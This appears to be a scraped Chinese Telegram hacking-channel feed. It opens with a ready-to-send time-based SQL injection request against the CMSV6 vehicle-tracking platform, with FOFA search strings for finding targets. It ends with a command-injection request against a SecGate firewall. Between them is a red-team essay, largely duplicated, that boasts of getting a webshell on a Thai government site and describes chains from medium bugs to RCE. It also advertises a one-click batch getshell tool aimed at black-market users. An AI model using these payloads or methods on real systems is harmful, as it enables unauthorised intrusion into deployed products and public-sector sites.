通天星CMSV6车载定位监控平台存在SQL注入漏洞
FOFA:body="/808gps/"
FOFA:body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1Host: your-ipUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0Accept: */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: close
由于昨天品鉴手撕长亭内网k大黑客去了,没有更新,今天把文章写完补上,关于复健红队两个星期,除了审0day之外,扫哥向一名合格的高级红队转型还有哪些方面的思路
很多时候我们都听过这么一种说法,“拿扫描器扫了没洞,要打只有用0day了”,仿佛红队拿下目标站点除了nday和0day两种方法就没别的了。这个说法有道理,很多时候确实是这样,但是并不绝对。每年护网的时候看见其他队伍嘎嘎上分并不是人家上来就用大day子招呼,白盒审计的0day是有局限性的。首先0day杀伤力高同时成本也高,这么多代码一个文件一个文件的看,你就算seem附体一年爆三十个,剔除低危中危以及资产没几个的特定版本的和已经提交src的,那几个0day正好在演练的时候能到用上的几率其实不大,你专门为了护网攒那当我没说 。今天这个帖子就总结一下我个人理解的,介于nday和0day之间,一般在国内各种文章被统称为“手法”的这个东西到底具体是个啥。
我对手法的定义是,在没有0day的情况下通过你自身丰富的渗透经验和网络各层面组件框架运行原理的熟悉,对于一个指定的站点,即时的,黑盒的渗透技术。如果说扫哥是亵渎圣剑摁着ctrl不松手无脑复读战技,审计0day是龙王岩剑放雷云化身前摇长但是打中了直接一发送走,那么手法神就是跳劈出血双小曲,会玩的能秀出各种骚姿势层层递进一套组合技行云流水,不会玩的一顿操作看着也挺行云流水的就是没伤害。手法的第一个方向是资产信息收集,很多网课以及培训都会讲,但同时也是初学者在渗透过程中最容易忽略的一步。对于资产多站点多的情况信息收集是非常重要的,爆源码爆密码复用爆社工信息爆子域名爆敏感信息爆c段,等等等等。我这里不细讲以及举具体例子,不是因为这个方向不重要而是我特么不咋熟。你可以去问问那些给公安打博彩盘口的日博哥信息收集有多重要,很多时候网站都是缺口就是从这个方向逐渐打开的,不要老盯着个登录框死磕,你磕不出来啥东西。
手法的第二个方向,是能对使用了框架但是又自己二开了的站点精确打击。有些网站他用了某某框架,但是网站的运维觉得框架还不足以实现他想要的功能就会修改增添文件对网站进行二开处理。比如我之前在频道里发过的某个幽默的go.th泰国政府网站,框架是最新的,扫描器框框扫nday打完了一无所获,结果在网站某路径下边发现一个upload.php页面,原本这个框架是没有的,一看就是网站开发人员自己写的方便实现某些业务,只用了前端js过滤文件后缀,浏览器禁用js,一个shell.php上去就拿到shell了——没用nday也没用0day吧。类似的,验证码伪随机,接口sql注入或者未授权adduser,文件上传点等都是二开源码特色并且不用白盒源码就能测试出来的漏洞。另外像微信小程序,某某测试登录平台,数据管理系统这样的边缘资产大多数都是不用框架自己写的,nday扫不出来漏洞,但是如果手法过硬多测试一下绝对能框框上分。
第三个在站点只有是中危漏洞,比如信息泄露这种,如何结合具体情况巧妙利用最后从中危到getshell。这个时候我相信很多有人会说了,这个简单,我懂,比如xss打到cookies进后台上传图片马未授权访问进后台上传图片马前端信息泄露登录小号进个人主页传图片马弱口令进去后台传图片马,微信公众号都这么写的,爽文记一次xx到getshell实战记一次xx到博彩网getshell从xx到getshell的利用,等等。大部分殊途同归最后都是进后台传图片马 。真正实战的时候大部分后台你webshell是传不上去的,为什么公众号那么多成功的就我一个都遇不到?别老盯着那两篇爽文看,你能看到的当然都是成功了的所以发出来的,没成功的经历你也看不到(你猜猜人家作者为什么文章题目要写个爽文) 。中危漏洞玩的花样很多,redis未授权到主从复制rce,任意文件读取读.bash_history读到数据库密码利用特定文件写入函数os shell,xxe读取tomcat-users.xml再配合SSRF来getshell等等。这种从中危到getshell一方面能扩大你的攻击面(很多网站都修高危不修中危低危),同时大多数都要结合网站具体架构具体操作,难以自动化一键利用,加强这方面能力往往能突破各种扫描器和nday利用工具无法突破的点,比如我之前打韩国真就一个0day没用,稍微有那么一点中危利用的手法,效果其实就很明显了。
第四是,在有nday但是难以利用的特殊情况下能把nday成功利用了。这里就不得不提一下奇安信攻防社区的这篇文章,https://forum.butian.net/share/2596
强到不行的绕过手法和思路。还有个例子是之前在微信读到一篇文章,echo免杀马base64写入再certuti命令解码结果遇到web路径有中文,逆天骚思路把asp站点的web.config里的路径提取出来存在txt中,取路径作为变量批量往里usebackq delims=。锻炼这方面的能力个人建议多打ctf,ctf比赛对于这块的培养是相当强的,(暴论,ctf里的web选手都是手法神)
第五,信息收集搞到源码再白盒审计爆0day,对于那种纯自己写的网站或者小框架,没有历史nday,每个站都审一次,审一次也就打进去这一个站,我称之为事件型0day。有人肯定要说你特么不搞笑吗审一个洞花多大劲就为了这么一次难不成你天天审?事实上天天起0day就为了一个站现场手搓在某些地方是很正常的,你觉得我吹牛也正常,理解,我没证据我也不强求你信,行吧,就这样
很多时候我们都听过这么一种说法,“拿扫描器扫了没洞,要打只有用0day了”,仿佛红队拿下目标站点除了nday和0day两种方法就没别的了。这个说法有道理,很多时候确实是这样,但是并不绝对。每年护网的时候看见其他队伍嘎嘎上分并不是人家上来就用大day子招呼,白盒审计的0day是有局限性的。首先0day杀伤力高同时成本也高,这么多代码一个文件一个文件的看,你就算seem附体一年爆三十个,剔除低危中危以及资产没几个的特定版本的和已经提交src的,那几个0day正好在演练的时候能到用上的几率其实不大,
我对手法的定义是,在没有0day的情况下通过你自身丰富的渗透经验和网络各层面组件框架运行原理的熟悉,对于一个指定的站点,即时的,黑盒的渗透技术。如果说扫哥是亵渎圣剑摁着ctrl不松手无脑复读战技,审计0day是龙王岩剑放雷云化身前摇长但是打中了直接一发送走,那么手法神就是跳劈出血双小曲,会玩的能秀出各种骚姿势层层递进一套组合技行云流水,不会玩的一顿操作看着也挺行云流水的就是没伤害。手法的第一个方向是资产信息收集,很多网课以及培训都会讲,但同时也是初学者在渗透过程中最容易忽略的一步。对于资产多站点多的情况信息收集是非常重要的,爆源码爆密码复用爆社工信息爆子域名爆敏感信息爆c段,等等等等。我这里不细讲以及举具体例子,不是因为这个方向不重要而是我特么不咋熟。你可以去问问那些给公安打博彩盘口的日博哥信息收集有多重要,很多时候网站都是缺口就是从这个方向逐渐打开的,不要老盯着个登录框死磕,你磕不出来啥东西。
手法的第二个方向,是能对使用了框架但是又自己二开了的站点精确打击。有些网站他用了某某框架,但是网站的运维觉得框架还不足以实现他想要的功能就会修改增添文件对网站进行二开处理。比如我之前在频道里发过的某个幽默的go.th泰国政府网站,框架是最新的,扫描器框框扫nday打完了一无所获,结果在网站某路径下边发现一个upload.php页面,原本这个框架是没有的,一看就是网站开发人员自己写的方便实现某些业务,只用了前端js过滤文件后缀,浏览器禁用js,一个shell.php上去就拿到shell了——没用nday也没用0day吧。类似的,验证码伪随机,接口sql注入或者未授权adduser,文件上传点等都是二开源码特色并且不用白盒源码就能测试出来的漏洞。另外像微信小程序,某某测试登录平台,数据管理系统这样的边缘资产大多数都是不用框架自己写的,nday扫不出来漏洞,但是如果手法过硬多测试一下绝对能框框上分。
第三个在站点只有是中危漏洞,比如信息泄露这种,如何结合具体情况巧妙利用最后从中危到getshell。这个时候我相信很多有人会说了,这个简单,我懂,比如xss打到cookies进后台上传图片马未授权访问进后台上传图片马前端信息泄露登录小号进个人主页传图片马弱口令进去后台传图片马,微信公众号都这么写的,爽文记一次xx到getshell实战记一次xx到博彩网getshell从xx到getshell的利用,等等。大部分殊途同归最后都是进后台传图片马 。真正实战的时候大部分后台你webshell是传不上去的,为什么公众号那么多成功的就我一个都遇不到?别老盯着那两篇爽文看,你能看到的当然都是成功了的所以发出来的,没成功的经历你也看不到
第四是,在有nday但是难以利用的特殊情况下能把nday成功利用了。这里就不得不提一下奇安信攻防社区的这篇文章,https://forum.butian.net/share/2596
强到不行的绕过手法和思路。还有个例子是之前在微信读到一篇文章,echo免杀马base64写入再certuti命令解码结果遇到web路径有中文,逆天骚思路把asp站点的web.config里的路径提取出来存在txt中,取路径作为变量批量往里usebackq delims=。锻炼这方面的能力个人建议多打ctf,ctf比赛对于这块的培养是相当强的,(暴论,ctf里的web选手都是手法神)
第五,信息收集搞到源码再白盒审计爆0day,对于那种纯自己写的网站或者小框架,没有历史nday,每个站都审一次,审一次也就打进去这一个站,我称之为事件型0day。有人肯定要说你特么不搞笑吗审一个洞花多大劲就为了这么一次难不成你天天审?事实上天天起0day就为了一个站现场手搓在某些地方是很正常的,你觉得我吹牛也正常,理解,我没证据我也不强求你信,行吧,就这样
👍17❤4
TG上许多圈哥都在发的xx一键批量getshell傻瓜式工具,我也写了一个,GPT就能搓的东西,GitHub也有上一堆免费的真没必要去傻乎乎的爆金币
用法 -u 单个url
-f txt
-t指定线程,默认为50
黑产哥可能要问了,孩子shell传上去了密码是多少呢?国内漏洞我还是怕出事,就不告诉你,自己扒拉源码翻吧
用法 -u 单个url
-f txt
-t指定线程,默认为50
黑产哥可能要问了,孩子shell传上去了密码是多少呢?国内漏洞我还是怕出事,就不告诉你,自己扒拉源码翻吧
🥰4
https://www.secrss.com/articles/64457
🎶🎶🎶🎶🎶🎶🎶🎶🎶🎶🎶🎶🤓Never let you go,it's why I did them all🤓
For a chance at least~~🎻, to live in your way🎻🎻
Love of you👿 is my most cherished thing😭😭😭😭
😡👊🏻So stay alive, bravely.
🎶🎶🎶🎶🎶🎶🎶🎶🎶🎶🎶🎶
🎶🎶🎶🎶🎶🎶🎶🎶🎶🎶🎶🎶🤓Never let you go,it's why I did them all🤓
For a chance at least~~🎻, to live in your way🎻🎻
Love of you👿 is my most cherished thing😭😭😭😭
😡👊🏻So stay alive, bravely.
🎶🎶🎶🎶🎶🎶🎶🎶🎶🎶🎶🎶
Secrss
韩国加快网络空间能力建设
此举旨在推动实现2023版《国家安全战略》对网络空间领域提出的发展目标和要求,也与近日发布的新版《国家网络安全战略》相互呼应。
👍2🥴1
奇安信网神SecGate 3600 A1500 防火墙存在前台命令执行漏洞
POST /cgi-bin/sysTools/sysToolsDetectNet.cgi HTTP/1.1Host: xxxxxxxUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0Accept: text/plain, */*; q=0.01Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequesttargetHost=|ping|
👍3❤1
